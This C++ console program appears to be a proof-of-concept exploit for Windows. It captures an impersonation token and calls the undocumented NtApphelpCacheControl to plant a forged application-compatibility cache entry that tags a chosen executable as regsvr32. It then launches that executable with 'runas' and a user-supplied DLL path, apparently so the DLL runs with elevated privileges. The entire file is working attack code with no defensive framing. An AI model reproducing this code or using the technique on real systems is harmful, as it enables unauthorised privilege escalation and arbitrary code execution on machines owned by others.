// AppCompatCache.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <string>
#include "sdb.h"

#define BUF_SIZE 0x108

enum APPHELPCOMMAND
{
	AppHelpQuery, // 0 -> 0x22003 DeviceIoControl
	AppHelpRemove, // 1 -> 0x22007
	AppHelpUpdate, // 2 -> 0x2200B (Admin)
	AppHelpEnum,  // 3 -> 0x2200F (Admin) (Looks unused)
	AppHelpNotifyStart, // 4 -> 0x220013 (Admin)
	AppHelpWriteRegistry, // 5 -> 0x220017 (Admin)
	AppHelpNotifyStop, // 6 -> 0x22001B (Admin)
	AppHelpForward, // 7 -> 0x22001F (looks to forward communication to helper service)
	AppHelpSnapshot, // 8 -> 0x220023 (Admin)
	AppHelpQueryModule, // 9 -> 0x220027
	AppHelpRefresh, // 10 -> 0x22002B
	AppHelpCheckForChange, // 11 -> 0x22002F
	AppHelpQueryHwId, // 12 (doesnt go to driver, calls AchCacheQueryHwId)
};

struct ApphelpCacheControlData
{
	BYTE   unk0[0x98];          // 0x00 -> 0x98 (all zeros?)
	DWORD  query_flags;           // 0x98;
	DWORD  cache_flags;         // 0x9C	  
	HANDLE file_handle;	    // 0xA0
	HANDLE process_handle;	    // 0xA4
	UNICODE_STRING file_name;   // 0xA8
	UNICODE_STRING package_name;// 0xB0
	DWORD          buf_len;     // 0xB8
	LPVOID         buffer;      // 0xBC
	BYTE           unkC0[0x2C]; // 0xC0 -> 0xEC
	UNICODE_STRING module_name; // 0xEC (used for 9)
	BYTE           unkF4[0x14]; // 0xF4 -> 0x108
};

typedef NTSTATUS(NTAPI *_NtApphelpCacheControl)(APPHELPCOMMAND type, void* buf);
typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);

HANDLE CaptureImpersonationToken();

struct APPHELP_QUERY
{
	int match_tags[16];
	int unk40[16];
	int layer_tags[8];
	int flags;
	int main_tag;
	int match_count;
	int layer_count;
	GUID exe_guid;
	int unkC0[264/4];
};

BOOL resolveSdbFunctions();
extern SdbOpenDatabase SdbOpenDatabasePtr;
extern SdbCloseDatabase SdbCloseDatabasePtr;
extern SdbTagToString SdbTagToStringPtr;
extern SdbGetFirstChild SdbGetFirstChildPtr;
extern SdbGetTagFromTagID SdbGetTagFromTagIDPtr;
extern SdbGetNextChild SdbGetNextChildPtr;
extern SdbReadBinaryTag SdbReadBinaryTagPtr;

TAGID findExeByGuid(PDB db, TAGID tid, REFGUID exe_guid)
{
	TAG tmpTag = 0;
	DWORD dwD = 0;
	TAGID newtid = TAGID_NULL;
	LPCTSTR tmp;
	DWORD i = 0;
	GUID guid;

	newtid = SdbGetFirstChildPtr(db, tid);
	while (newtid != TAGID_NULL)
	{
		tmpTag = SdbGetTagFromTagIDPtr(db, newtid);
		tmp = SdbTagToStringPtr(tmpTag);

		// process tag types
		switch (tmpTag & 0xFFFF)
		{
		case TAG_EXE_ID:
			if (SdbReadBinaryTagPtr(db, newtid, (PBYTE)&guid, sizeof(guid)))
			{
				if (IsEqualGUID(guid, exe_guid))
				{
					return tid;
				}
			}
			break;

		default:
			break;
		}

		// recursive
		if ((tmpTag & TAG_TYPE_LIST) == TAG_TYPE_LIST)
		{
			TAGID ret = findExeByGuid(db, newtid, exe_guid);
			if (ret != 0)
			{
				return ret;
			}
		}

		// get next tag
		newtid = SdbGetNextChildPtr(db, tid, newtid);
	}

	return 0;
}

TAGID GetTagForRegsvr32()
{
	resolveSdbFunctions();

	PDB db = SdbOpenDatabasePtr(L"\\SystemRoot\\AppPatch\\sysmain.sdb", NT_PATH);
	if (!db)
	{
		DWORD stat = GetLastError();
		printf("Failed to load SDB file %d\n", stat);
		return 0;
	}

	GUID guid;

	IIDFromString(L"{2C7437C1-7105-40D3-BF84-D493A4F62DDB}", &guid);

	TAGID ret = findExeByGuid(db, TAGID_ROOT, guid);

	SdbCloseDatabasePtr(db);

	return ret;
}

int _tmain(int argc, _TCHAR* argv[])
{	
	if (argc < 3)
	{
		printf("Usage: AppCompatCache path dllpath\n");		
		return 1;
	}

	WCHAR dllpath_buf[MAX_PATH];

	if (!GetFullPathName(argv[2], MAX_PATH, dllpath_buf, nullptr))
	{
		printf("Couldn't get fullpath to dll %d\n", GetLastError());
		return 1;
	}

	std::wstring dllpath;

	dllpath = L"\"";
	dllpath += dllpath_buf;
	dllpath += L"\"";

	TAGID tag = GetTagForRegsvr32();
	if (tag == 0)
	{
		printf("Failed to get SDB tag for regsvr32\n");
		return 1;
	}

	printf("Found regsvr32.exe tag: %08X\n", tag);

	HANDLE token = CaptureImpersonationToken();
	_RtlInitUnicodeString fRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll"), "RtlInitUnicodeString");
	_NtApphelpCacheControl fNtApphelpCacheControl = (_NtApphelpCacheControl)GetProcAddress(GetModuleHandle(L"ntdll"), "NtApphelpCacheControl");

	ApphelpCacheControlData data = { 0 };

	std::wstring full_path = L"\\??\\";
	full_path += argv[1];

	printf("Interposing on cache for %ls\n", full_path.c_str());

	fRtlInitUnicodeString(&data.file_name, full_path.c_str());

	data.file_handle = CreateFile(argv[1], FILE_READ_ATTRIBUTES, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
		nullptr, OPEN_EXISTING, 0, 0);
	if (data.file_handle == INVALID_HANDLE_VALUE)
	{
		printf("Error opening file %ls %d\n", argv[1], GetLastError());
		return 1;
	}

	data.query_flags = 0xFF;
	data.cache_flags = 1;
		
	APPHELP_QUERY query = { 0 };
	query.match_count = 1;
	query.layer_count = 0;	
	query.match_tags[0] = tag;
	query.unkC0[0] = 1;

	data.buffer = &query;
	data.buf_len = sizeof(query);

	int status = -1;

	// Ensure it the cache if flushed
	fNtApphelpCacheControl(AppHelpRemove, &data);	

	if (SetThreadToken(nullptr, token))
	{
		status = fNtApphelpCacheControl(AppHelpUpdate, &data);
		RevertToSelf();		
	}		
	else
	{
		status = GetLastError();
	}

	if (status == 0)
	{
		LPCWSTR verb = L"runas";

		if ((argc > 3) && (wcscmp(argv[3], L"-n") == 0))
		{
			verb = L"open";
		}

		printf("Calling %ls on %ls with command line %ls\n", verb, argv[1], dllpath.c_str());

		ShellExecuteW(nullptr, verb, argv[1], dllpath.c_str(), nullptr, SW_SHOW);		

		printf("Remove: %08X\n", fNtApphelpCacheControl(AppHelpRemove, &data));
	}
	else
	{
		printf("Error adding cache entry: %08X\n", status);
	}

	return 0;
}

